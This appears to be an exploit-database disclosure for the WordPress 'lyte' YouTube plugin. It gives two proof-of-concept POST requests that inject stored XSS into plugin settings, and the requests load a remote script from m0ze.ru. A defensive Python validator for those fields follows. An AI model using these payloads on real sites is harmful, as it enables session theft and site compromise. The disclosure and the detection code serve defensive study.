## https://sploitus.com/exploit?id=WPEX-ID:0EEFF1EE-D11E-4D52-A032-5F5BD8A6A2D7
PoC #1 | Authenticated Persistent XSS | Your YouTube API key:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0



PoC #2 | Authenticated Persistent XSS | &lyte_notification:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0
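
A server-side check for the two requests above, added here as a defensive example; it is not part of the original advisory or the plugin's code. It validates the `lyte_*` fields of an `options.php` body after URL-decoding; the API-key character set, the helper names and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumed allowlists for the fields seen in the requests above.
API_KEY_RE = re.compile(r"[A-Za-z0-9_-]*")   # assumption: keys are URL-safe tokens
NUMERIC_RE = re.compile(r"[0-9]*")
MARKUP_RE = re.compile(r"[<>\"'`]")          # characters that can break out of an attribute
NUMERIC_FIELDS = {
    "lyte_size", "lyte_show_links", "lyte_position", "lyte_hidef",
    "lyte_microdata", "lyte_greedy", "lyte_local_thumb", "lyte_disclaimer",
}

def audit_lyte_settings(body: str) -> dict:
    """Return {field: reason} for every lyte_* field that fails validation."""
    findings = {}
    # parse_qs URL-decodes, so %22%3E and "+" are inspected in decoded form.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if not name.startswith("lyte_"):
            continue
        for value in values:
            if name == "lyte_yt_api_key":
                if not API_KEY_RE.fullmatch(value):
                    findings[name] = "not a plain API key"
            elif name in NUMERIC_FIELDS:
                if not NUMERIC_RE.fullmatch(value):
                    findings[name] = "not numeric"
            elif MARKUP_RE.search(value):
                # Free-text fields such as lyte_notification
                findings[name] = "contains HTML metacharacters"
    return findings

# Constructed sample input: a benign settings body plus overrides.
BASE_FIELDS = {
    "option_page": "lyte-settings-group", "action": "update",
    "lyte_notification": "", "lyte_yt_api_key": "",
    "lyte_size": "0", "lyte_show_links": "0", "lyte_position": "0",
}
CONSTRUCTED_MARKUP = '"><b>test</b><div x'   # harmless stand-in for injected markup

def sample_body(**overrides) -> str:
    return urlencode({**BASE_FIELDS, **overrides})

if __name__ == "__main__":
    for field in ("lyte_yt_api_key", "lyte_notification"):
        print(field, audit_lyte_settings(sample_body(**{field: CONSTRUCTED_MARKUP})))
```

A request-level check like this is a detection aid; the durable fix is for the plugin to sanitise these options on save and escape them on output.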